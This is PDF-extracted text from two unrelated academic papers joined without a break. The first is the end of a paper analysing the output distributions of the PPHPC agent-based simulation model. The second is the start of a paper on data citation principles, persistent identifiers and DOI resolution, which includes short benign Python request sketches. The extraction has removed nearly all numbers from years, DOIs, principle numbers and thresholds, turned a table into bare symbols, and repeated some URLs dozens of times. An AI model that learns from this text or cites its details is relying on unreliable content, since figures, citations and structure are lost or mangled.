table empirical classification (from to ) of each fm according to how close it follows the normal distribution for the tested size@set combinations. the last row outlines the overall normality of each statistic. xi stat. 
max ≤i≤m xi arg max ≤i≤mxi min ≤i≤m xi arg min ≤i≤mxi x ss sss psi ••••• ••⃝⃝⃝ ••◐⃝⃝ ⃝⃝⃝⃝⃝ ••••• ••••◐ pwi ••••⃝ •◐⃝⃝⃝ ••••• •••⃝⃝ ••••• ••••◐ pci ••••• ◐⃝⃝⃝⃝ ••••• •••⃝⃝ ••••• ••••◐ e s i ••••⃝ •⃝⃝⃝⃝ ••••• ◐⃝⃝⃝⃝ ••••• ••••◐ e w i ••••• •••⃝⃝ ••••• ◐⃝⃝⃝⃝ ••••• ••••⃝ ci ••••• ••◐⃝⃝ ••••• ⃝⃝⃝⃝⃝ ••••• ••••◐ stat. wise ••••◐ ••⃝⃝⃝ ••••◐ •⃝⃝⃝⃝ ••••• ••••◐ distant outliers). while sizes and follow an approximately normal distribution, larger sizes seem more fit to be analyzed using discrete distributions such as poisson or binomial. ci ss . this fm follows an approximately normal distribution. while most size/parameter combinations have a few outliers, only for @ is the existing outlier capable of making the sw test produce a p-value below the % significance threshold. sss(ci). although passing the sw normality test (p-value > . ) in most cases, we again note the positive skewness of the steady-state sample standard deviation samples, suggesting that distributions such as weibull or lognormal maybe a better fit. statistics-wise distribution trends table summarizes the descriptions given in the previous section. it was built by assigning an empirical classification from to to each fm according to how close it follows the normal distribution for the tested size@set combinations. more specifically, individual classifications were determined by analyzing the information provided in tables s . –s . , prioritizing the sw test result (i.e. if the p-value is above . and/or . ) and distributional discreteness (observable in the q–q plots). this classification can be used as a guide to whether parametric or non-parametric statistical methods should be used to further analyze the fms or to compare fms of different pphpc implementations. the last row shows the average classification of individual outputs for a given statistic, outlining its overall normality. the max and min statistics yield mostly normal distributions, although care should be taken when the maximum or minimum systematically converge to the same value, e.g., when they occur at iteration zero. nonetheless, parametric methods seem adequate for fms drawn from these statistics. the same does not apply to the arg max and arg min statistics, which show a large variety of distributional behaviors (including normality in some cases). thus, these statistics are better handled with non-parametric techniques. the steady-state mean typically displays distributions very close to normal, probably due to central-limit-theorem type effects, as described by law ( ) for mean or average-based fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. fms. consequently, parametric methods will most likely be suitable for this statistic. finally, fms based on the steady-state sample standard deviation display normal-like behavior, albeit with consistently positive skewness; in fact, they are probably better represented by a weibull or lognormal distribution. while parametric methods may be used for this statistic, results should be interpreted cautiously. discussion in this paper, the pphpc model is completely specified, and an exhaustive analysis of the respective simulation outputs is performed. 
regarding the latter, after determining the mean and variance of the several fms, we opted to study their distributional properties instead of proceeding with the classical analysis suggested by simulation output analysis literature (i.e., the establishment of cis.). this approach has a number of practical uses. for example, if we were to estimate cis for fms drawn from the steady-state mean, we could use t-distribution cis with some confidence, as these fms display an approximately normal distribution. if we did the same for fms drawn from the steady-state sample standard deviation, the willink ( ) ci would be preferable, as it accounts for the skewness displayed by these fms. estimating cis without a good understanding of the underlying distribution can be misleading, especially if the distribution is multimodal. the approach taken here is also useful for comparing different pphpc implementations. if we were to compare max or min-based fms, which seem to follow approximately normal distributions, parametric tests such as the t-test would most likely produce valid conclusions. on the other hand, if we compare arg max or arg min-based fms, non-parametric tests, such as the mann-whitney u test (gibbons & chakraborti, ), would be more adequate, as these fms do not usually follow a normal distribution. however, the scope of the pphpc model is significantly broader. for example, in fachada et al. ( b), pphpc is reimplemented in java with several user-selectable parallelization strategies. the goal is to clarify which are the best parallelization approaches for sabms in general. a n-sample statistical test is applied to each fm, for all implemen- tations and strategies simultaneously, in order to verify that these do not yield dissimilar results. in fachada et al. ( a), pphpc is used for presenting a novel model-independent comparison technique which directly uses simulation outputs, bypassing the need of selecting model-specific fms. the pphpc model is made available to other researchers via the source code, in addition to the specification presented here. all the data analyzed in this paper is also available as supplemental information. pphpc can be used as a pure computational model without worrying with aspects like visualization and user interfaces, allowing for direct performance comparison of different implementations. conclusion in this paper, we presented pphpc, a conceptual model which captures important charac- teristics of sabms. the model was comprehensively described using the odd protocol, a netlogo canonical implementation was reported, and simulation outputs were thoroughly studied from a statistical perspective for two parameter sets and several model sizes. while fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. many abms have been published, proper model description and analysis is lacking in the scientific literature, and thus this paper can be seen as a guideline or methodology to improve model specification and communication in the field. furthermore, pphpc aims to be a standard model for research in agent-based modeling and simulation, such as, but not limited to, statistical model comparison techniques, performance comparison of parallel implementations, and testing the influence of different prngs on the statistical accuracy of simulation output. 
additional information and declarations funding this work was supported by the fundação para a ciência e a tecnologia (fct) projects uid/eea/ / , uid/mat/ / and (p. rd ) incen- tivo/eei/la / , and partially funded with grant sfrh/bd/ / , also from fct. the author vitor v. lopes acknowledges the financial support from the prometeo project of senescyt (ecuador). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: fundação para a ciência e a tecnologia (fct): uid/eea/ / , uid/mat/ / , incentivo/eei/la / , sfrh/bd/ / . senescyt: prometeo project. competing interests the authors declare there are no competing interests. author contributions • nuno fachada conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • vitor v. lopes conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. • rui c. martins analyzed the data, reviewed drafts of the paper. • agostinho c. rosa contributed reagents/materials/analysis tools, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/fakenmc/pphpc/tree/netlogo. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo 
submitted december, accepted february, published may
corresponding author tim clark, tim_clark@harvard.edu
academic editor harry hochheiser
additional information and declarations can be found on page
doi . /peerj-cs.
distributed under creative commons public domain dedication, open access

achieving human and machine accessibility of cited data in scholarly publications

joan starr, eleni castro, mercè crosas, michel dumontier, robert r. downs, ruth duerr, laurel l. haak, melissa haendel, ivan herman, simon hodson, joe hourclé, john ernest kratz, jennifer lin, lars holm nielsen, amy nurnberger, stefan proell, andreas rauber, simone sacchi, arthur smith, mike taylor and tim clark

california digital library, oakland, ca, united states of america
institute of quantitative social sciences, harvard university, cambridge, ma, united states of america
stanford university school of medicine, stanford, ca, united states of america
center for international earth science information network (ciesin), columbia university, palisades, ny, united states of america
national snow and ice data center, boulder, co, united states of america
orcid, inc., bethesda, md, united states of america
oregon health and science university, portland, or, united states of america
world wide web consortium (w c)/centrum wiskunde en informatica (cwi), amsterdam, netherlands
icsu committee on data for science and technology (codata), paris, france
solar data analysis center, nasa goddard space flight center, greenbelt, md, united states of america
public library of science, san francisco, ca, united states of america
european organization for nuclear research (cern), geneva, switzerland
columbia university libraries/information services, new york, ny, united states of america
sba research, vienna, austria
institute of software technology and interactive systems, vienna university of technology/tu wien, austria
american physical society, ridge, ny, united states of america
elsevier, oxford, united kingdom
harvard medical school, boston, ma, united states of america

abstract
reproducibility and reusability of research results is an important concern in scientific communication and science policy. a foundational element of reproducibility and reusability is the open and persistently available presentation of research data. however, many common approaches for primary data publication in use today do not achieve sufficient long-term robustness, openness, accessibility or uniformity. nor do they permit comprehensive exploitation by modern web technologies. this has led to several authoritative studies recommending uniform direct citation of data archived in persistent repositories. data are to be considered as first-class scholarly objects, and treated similarly in many ways to cited and archived scientific and scholarly literature.
here we briefly review the most current and widely agreed set of principle-based recommendations for scholarly data citation, the joint declaration of data citation principles (jddcp). we then present a framework for operationalizing the jddcp; and a set of initial recommendations on identifier schemes,
the atlas of protein sequence and structure, published from to , was the original form in which protein sequence data was compiled: a book, which could be cited (strasser, ). today the data volumes involved are absurdly large (salzberg & pop, ; shendure & ji, ; stein, ). similar transitions from printed tabular data to digitized data on the web have taken place across disciplines. reports from leading scholarly organizations have now recommended a uniform approach to treating research data as first-class research objects, similarly to the way textual publications are archived, indexed, and cited (codata-icsti task group , ; altman & king, ; uhlir, ; ball & duke, ). uniform citation of robustly archived, starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. described, and identified data in persistent digital repositories is proposed as an important step towards significantly improving the discoverability, documentation, validation, reproducibility, and reuse of scholarly data (codata-icsti task group , ; altman & king, ; uhlir, ; ball & duke, ; goodman et al., ; borgman, ; parsons, duerr & minster, ). the joint declaration of data citation principles (jddcp) (data citation synthesis group, ) is a set of top-level guidelines developed by several stakeholder organizations as a formal synthesis of current best-practice recommendations for common approaches to data citation. it is based on significant study by participating groups and independent scholars. the work of this group was hosted by the force (http://force .org) individuals representing the following organizations participated in the jddcp development effort: biomed central; california digital library; codata-icsti task group on data citation standards and practices; columbia university; creative commons; datacite; digital science; elsevier; european molecular biology laboratories/european bioinformatics institute; european organization for nuclear research (cern); federation of earth science information partners (esip); force .org; harvard institute for quantitative social sciences; icsu world data system; international as- sociation of stm publishers; library of congress (us); massachusetts general hospital; mit libraries; nasa solar data analysis center; the national academies (us); openaire; rensselaer polytechnic institute; research data alliance; science exchange; national snow and ice data center (us); natural environment research council (uk); national academy of sciences (us); sba research (at); national information standards organization (us); university of california, san diego; university of leuven/ku leuven (nl); university of oxford; vu university amsterdam; world wide web consortium (digital publishing activity). see https://www.force .org/ datacitation/workinggroup for details. community, an open forum for discussion and action on important issues related to the future of research communication and e-scholarship. the jddcp is the latest development in a collective process, reaching back to at least , to raise the importance of data as an independent scholarly product and to make data transparently available for verification and reproducibility (altman & crosas, ). the purpose of this document is to outline a set of common guidelines to operationalize jddcp-compliant data citation, archiving, and programmatic machine accessibility in a way that is as uniform as possible across conforming repositories and associated data citations. 
the recommendations outlined here were developed as part of a community process by participants representing a wide variety of scholarly organizations, hosted by the force data citation implementation group (dcig) (https://www.force .org/ datacitationimplementation). this work was conducted over a period of approximately one year beginning in early as a follow-on activity to the completed jddcp. why cite data? data citation is intended to help guard the integrity of scholarly conclusions and provides a basis for integrating exponentially growing datasets into new forms of scholarly publishing. both of these goals require the systematic availability of primary data in both machine- and human-tractable forms for re-use. a systematic review of current approaches is provided in codata-icsti task group ( ). three common practices in academic publishing today block the systematic reuse of data. the first is the citation of primary research data in footnotes, typically either of the form, “data is available from the authors upon request”, or “data is to be found on the authors’ laboratory website, http://example.com”. the second is publication of datasets as “supplementary file” or “supplementary data” pdfs where data is given in widely varying formats, often as graphical tables, and which in the best case must be laboriously screen-scraped for re-use. the third is simply failure in one way or another to make the data available at all. integrity of conclusions (and assertions generally) can be guarded by tying individual assertions in text to the data supporting them. this is done already, after a fashion, for image data in molecular biology publications where assertions based on primary data contained in images typically directly cite a supporting figure within the text starr et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitation/workinggroup https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force 
.org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://dx.doi.org/ . /peerj-cs. containing the image. several publishers (e.g., plos, nature publications, and faculty of ) already partner with data archives such as figshare (http://figshare.com), dryad (http://datadryad.org/), dataverse (http://dataverse.org/), and others to archive images and other research data. citing data also helps to establish the value of the data’s contribution to research. moving to a cross-discipline standard for acknowledging the data allows researchers to justify continued funding for their data collection efforts (uhlir, ; codata-icsti task group , ). well defined standards allow bibliometric tools to find unanticipated uses of the data. current analysis of data use is a laborious process and rarely performed for disciplines outside of the disciplines considered the data’s core audience (accomazzi et al., ). the eight core principles of data citation the eight principles below have been endorsed by scholarly societies, publishers and other institutions. 
such a wide endorsement by influential groups reflects, in our view, these organizations include the american physical society, association of research libraries, biomed cen- tral, codata, crossref, datacite, dataone, data registration agency for social and economic data, elixir, elsevier, european molecular biology laboratories/european bioinformatics institute, leibniz institute for the social sciences, inter-university consortium for political and social research, international association of stm publishers, international union of biochemistry and molecular biology, international union of crystallography, international union of geodesy and geophysics, national information standards organization (us), nature publishing group, openaire, plos (public library of science), research data alliance, royal society of chemistry, swiss institute of bioinformatics, cambridge crystallographic data centre, thomson reuters, and the university of california curation center (california digital library). the meticulous work involved in preparing the key supporting studies (by codata, the national academies, and others (codata-icsti task group , ; uhlir, ; ball & duke, ; altman & king, ) and in harmonizing the principles; and supports the validity of these principles as foundational requirements for improving the scholarly publication ecosystem. • principle —importance: “data should be considered legitimate, citable products of research. data citations should be accorded the same importance in the scholarly record as citations of other research objects, such as publications.” • principle —credit and attribution: “data citations should facilitate giving scholarly credit and normative and legal attribution to all contributors to the data, recognizing that a single style or mechanism of attribution may not be applicable to all data.” • principle —evidence: “in scholarly literature, whenever and wherever a claim relies upon data, the corresponding data should be cited.” • principle —unique identification: “a data citation should include a persistent method for identification that is machine actionable, globally unique, and widely used by a community.” • principle —access: “data citations should facilitate access to the data themselves and to such associated metadata, documentation, code, and other materials, as are necessary for both humans and machines to make informed use of the referenced data.” • principle —persistence: “unique identifiers, and metadata describing the data, and its disposition, should persist—even beyond the lifespan of the data they describe.” • principle —specificity and verifiability: “data citations should facilitate identifica- tion of, access to, and verification of the specific data that support a claim. citations or citation metadata should include information about provenance and fixity sufficient to facilitate verifying that the specific time slice, version and/or granular portion of data retrieved subsequently is the same as was originally cited.” starr et al. ( ), peerj comput. sci., doi . /peerj-cs. 
• principle 8—interoperability and flexibility: "citation methods should be sufficiently flexible to accommodate the variant practices among communities, but should not differ so much that they compromise interoperability of data citation practices across communities."

these principles are meant to be adopted at an institutional or discipline-wide scale. the main target audience for the common implementation guidelines in this article consists of publishers, scholarly organizations, and persistent data repositories. individual researchers are not meant to set up their own data archives. in fact, this is contrary to one goal of data citation as we see it—which is to get away from inherently unstable citations via researcher footnotes indicating data availability at some intermittently supported laboratory website. however, individual researchers can contribute to and benefit from adoption of these principles by ensuring that primary research data is prepared for archival deposition at or before publication. we also note that often a researcher will want to go back to earlier primary data from their own lab—robust archiving positively ensures it will remain available for their own use in future, whatever the vicissitudes of local storage and lab personnel turnover.

implementation questions arising from the jddcp

the jddcp were presented by their authors as principles. implementation questions were left unaddressed. this was meant to keep the focus on harmonizing top-level and basically goal-oriented recommendations without incurring implementation-level distractions. therefore we organized a follow-on activity to produce a set of implementation guidelines intended to promote rapid, successful, and uniform jddcp adoption. we began by seeking to understand just what questions would arise naturally to an organization that wished to implement the jddcp. we then grouped the questions into four topic areas, to be addressed by individuals with special expertise in each area.

1. document data model—how should publishers adapt their document data models to support direct citation of data?
2. publishing workflows—how should publishers change their editorial workflows to support data citation? what do publisher data deposition and citation workflows look like where data is being cited today, such as in nature scientific data or gigascience?
3. common repository application program interfaces (apis)—are there any approaches that can provide standard programmatic access to data repositories for data deposition, search and retrieval?
4. identifiers, metadata, and machine accessibility—what identifier schemes, identifier resolution patterns, standard metadata, and recommended machine programmatic accessibility patterns are recommended for directly cited data?

the document data model group noted that publishers use a variety of xml schemas (bray et al., ; gao, sperberg-mcqueen & thompson, ; peterson et al., ) to model scholarly articles. however, there is a relevant national information standards organization (niso) specification, niso z . - , which is increasingly used by publishers, and is the archival form for biomedical publications in pubmed central. this niso z . - is derived from the former "nlm-dtd" model originally developed by the us national library of medicine. the group therefore developed a proposal for revision of the niso journal article tag suite to support direct data citation. niso-jats version . d (national center for biotechnology information, ), a revision based on this proposal, was released on december , , by the jats standing committee, and is considered a stable release, although it is not yet an official revision of the niso z . - standard.

the publishing workflows group met jointly with the research data alliance's publishing data workflows working group to collect and document exemplar publishing workflows. an article on this topic is in preparation, reviewing basic requirements and exemplar workflows from nature scientific data, gigascience (biomed central), f research, and geoscience data journal (wiley).

the common repository apis group is currently planning a pilot activity for a common api model for data repositories. recommendations will be published at the conclusion of the pilot. this work is being undertaken jointly with the elixir (http://www.elixir-europe.org/) fairport working group.

the identifiers, metadata, and machine accessibility group's recommendations are presented in the remainder of this article. these recommendations cover:

• definition of machine accessibility;
• identifiers and identifier schemes;
• landing pages;
• minimum acceptable information on landing pages;
• best practices for dataset description; and
• recommended data access methods.

recommendations for achieving machine accessibility

what is machine accessibility?

machine accessibility of cited data, in the context of this document and the jddcp, means access by well-documented web services (booth et al., )—preferably restful web services (fielding, ; fielding & taylor, ; richardson & ruby, ) to data and metadata stored in a robust repository, independently of integrated browser access by humans. web services are methods of program-to-program communication using web protocols. the world wide web consortium (w c, http://www.w .org) defines them as "software system[s] designed to support interoperable machine-to-machine interaction over a network" (haas & brown, ).
web services are always "on" and function essentially as utilities, providing services such as computation and data lookup, at web service endpoints. these are well-known web addresses, or uniform resource identifiers (uris) (berners-lee, fielding & masinter, ; jacobs & walsh, ). uris are very similar in concept to the more widely understood uniform resource locators (url, or "web address"), but uris do not specify the location of an object or service—they only identify it. uris specify abstract resources on the web. the associated server is responsible for resolving a uri to a specific physical resource—if the resource is resolvable. (uris may also be used to identify physical things such as books in a library, which are not directly resolvable resources on the web.)

restful web services follow the rest (representational state transfer) architecture developed by fielding and others (fielding, ). they support a standard set of operations such as "get" (retrieve), "post" (create), and "put" (create or update) and are highly useful in building hypermedia applications by combining services from many programs distributed on various web servers. machine accessibility, and particularly restful web service accessibility, is highly desirable because it enables construction of "lego block" style programs built up from various service calls distributed across the web, which need not be replicated locally. restful web services are recommended over the other major web service approach, soap interfaces (gudgin et al., ), due to our focus on the documents being served and their content. rest also allows multiple data formats such as json (javascript object notation) (ecma, ), and provides better support for mobile applications (e.g., caching, reduced bandwidth, etc.). clearly, "machine accessibility" is also an underlying prerequisite to human accessibility, as browser (client) access to remote data is always mediated by machine-to-machine communication. but for flexibility in construction of new programs and services, it needs to be independently available apart from access to data generated from the direct browser calls.
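to make this concrete, the sketch below shows what restful, machine-level access to a repository might look like in python using the requests library; the endpoint url, path, and response field names are hypothetical and will differ between repositories.

    import requests

    # hypothetical restful endpoint of a data repository; a real repository
    # documents its own base url, paths, and response fields.
    BASE_URL = "https://repository.example.org/api/datasets"

    def fetch_dataset_metadata(dataset_id):
        # a restful "get" retrieves a representation of the resource;
        # json is requested explicitly through the accept header.
        response = requests.get(
            f"{BASE_URL}/{dataset_id}",
            headers={"Accept": "application/json"},
            timeout=30,
        )
        response.raise_for_status()
        return response.json()

    if __name__ == "__main__":
        metadata = fetch_dataset_metadata("example-dataset")
        print(metadata.get("title"), metadata.get("identifier"))

such a call can be combined with others, "lego block" style, without any browser involvement, which is precisely the independence from direct browser access described above.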
unique identification

unique identification in a manner that is machine-resolvable on the web and demonstrates a long-term commitment to persistence is fundamental to providing access to cited data and its associated metadata. there are several identifier schemes on the web that meet these two criteria. the best identifiers for data citation in a particular community of practice will be those that meet these criteria and are widely used in that community. our general recommendation, based on the jddcp, is to use any currently available identifier scheme that is machine actionable, globally unique, and widely (and currently) used by a community, and that has demonstrated a long-term commitment to persistence. best practice, given the preceding, is to choose a scheme that is also cross-discipline. machine actionable in this context means resolvable on the web by web services. there are basically two kinds of identifier schemes available: (a) the native http and https schemes, where uris are the identifiers and address resolution occurs natively; and (b) schemes requiring a resolving authority, like digital object identifiers (dois). resolving authorities reside at well-known web addresses. they issue and keep track of identifiers in their scheme and resolve them by translating them to uris, which are then natively resolved by the web. for example, the doi . /rsos. when appended to the doi resolver at http://doi.org, resolves to the uri http://rsos.royalsocietypublishing.org/content/ / / . similarly, the biosample identifier sameg , when appended as ("biosample/sameg ") to the identifiers.org resolver at http://identifiers.org, resolves to the landing page www.ebi.ac.uk/biosamples/group/sameg . however resolved, a cited identifier should continue to resolve to an intermediary landing page (see below) even if the underlying data has been de-accessioned or is otherwise unavailable.
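the resolver pattern itself is simple string prefixing, as the python sketch below illustrates; the doi and biosample values are placeholders standing in for real identifiers issued by the corresponding authorities.

    # placeholder identifiers; substitute values actually issued by the
    # corresponding authority.
    doi = "10.0000/example"          # hypothetical doi
    biosample_group = "SAMEGxxxxx"   # hypothetical biosample group id

    # a doi becomes a natively resolvable uri when appended to the doi resolver.
    doi_uri = "http://doi.org/" + doi

    # an identifiers.org uri embeds the data resource name ("biosample") and
    # the native identifier used inside that database.
    biosample_uri = "http://identifiers.org/biosample/" + biosample_group

    print(doi_uri)
    print(biosample_uri)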
table : examples of identifier schemes meeting jddcp criteria.

identifier scheme | full name | authority | resolution uri
datacite doi (as uri) | datacite-assigned digital object identifier | datacite | http://dx.doi.org
crossref doi (as uri) | crossref-assigned digital object identifier | crossref | http://dx.doi.org
identifiers.org uri | identifiers.org-assigned uniform resource identifier | identifiers.org | http://identifiers.org
https uri | http or https uniform resource identifier | domain name owner | n/a
purl | persistent uniform resource locator | online computer library center (oclc) | http://purl.org
handle (hdl) | handle system | corporation for national research initiatives (cnri) | http://handle.net
ark | archival resource key | name assigning or mapping authorities (various)a | http://n t.net; name mapping authorities
nbn | national bibliographic number | various | various

notes. a registries maintained at california digital library, bibliothèque national de france and national library of medicine.

by a commitment to persistence, we mean that (a) if a resolving authority is required, that authority has demonstrated a reasonable chance to be present and functional in the future; and (b) the owner of the domain or the resolving authority has made a credible commitment to ensure that its identifiers will always resolve. a useful survey of persistent identifier schemes appears in hilse & kothe ( ).
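one simple way a repository or registry might monitor such a commitment (an illustration only, not a prescribed mechanism) is to periodically check that each cited identifier still resolves; a minimal python sketch, using a placeholder identifier uri, is shown below.

    import requests

    def still_resolves(identifier_uri, timeout=30):
        # follow redirects (e.g., from a resolver to the landing page) and
        # report whether the final response indicates an existing page.
        # note: some servers reject head requests, in which case a get
        # would be needed instead.
        try:
            response = requests.head(identifier_uri, allow_redirects=True,
                                     timeout=timeout)
            return response.status_code < 400
        except requests.RequestException:
            return False

    # placeholder identifier uri
    print(still_resolves("http://doi.org/10.0000/example"))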
examples of identifier schemes meeting jddcp criteria for robustly accessible data citation are shown in table and described below. this is not a comprehensive list and the criteria above should govern. table summarizes the approaches to achieving and enforcing persistence, and actions on object (data) removal from the archive, of each of the schemes. the subsections below briefly describe the exemplar identifier schemes shown in tables and .

digital object identifiers (dois)

digital object identifiers are an identification system originally developed by trade associations in the publishing industry for digital content over the internet. they were developed in partnership with the corporation for national research initiatives (cnri), and built upon cnri's handle system as an underlying network component. however, dois may identify digital objects of any type—certainly including data (international doi foundation, ). doi syntax is defined as a us national information standards organization standard, ansi/niso z . - . dois may be expressed as uris by prefixing the doi with a resolution address: http://dx.doi.org/<doi>. doi registration agencies provide services for registering dois along with descriptive metadata on the object being identified. the doi system proxy server allows programmatic access to doi name resolution using http (international doi foundation, ). datacite and crossref are the two doi registration agencies of special relevance to data citation. they provide services for registering and resolving identifiers for cited data.
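as an illustration of that programmatic access (a sketch assuming the registration agency supports http content negotiation at the doi proxy, as datacite and crossref generally do for the dois they register), a doi expressed as a uri can be dereferenced either to reach the landing page or to request machine-readable metadata; the doi shown is a placeholder.

    import requests

    def doi_as_uri(doi):
        # express a doi as a uri by prefixing the doi system proxy address.
        return "http://dx.doi.org/" + doi

    def machine_readable_metadata(doi):
        # http content negotiation at the proxy: ask for citation metadata
        # as json rather than the html landing page (assumes the registration
        # agency supports this; the media type below is the csl json form).
        response = requests.get(
            doi_as_uri(doi),
            headers={"Accept": "application/vnd.citationstyles.csl+json"},
            timeout=30,
        )
        response.raise_for_status()
        return response.json()

    print(doi_as_uri("10.0000/example"))   # placeholder doi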
table : identifier scheme persistence and object removal behavior.

identifier scheme | achieving persistence | enforcing persistence | action on object removal
datacite doi | registration with contracta | link checking | datacite contacts owners; metadata should persist
crossref doi | registration with contractb | link checking | crossref contacts owners per policyc; metadata should persist
identifiers.org uri | registration | link checking | metadata should persist
https uri | domain owner responsibility | none | domain owner responsibility
purl | uri registration | none | domain owner responsibility
handle (hdl) | registration | none | identifier should persist
ark | user-defined policies | hosting server | host-dependent; metadata should persistd
nbn | ietf rfc | domain resolver | metadata should persist

notes.
a the datacite persistence contract language reads: "objects assigned dois are stored and managed such that persistent access to them can be provided as appropriate and maintain all urls associated with the doi."
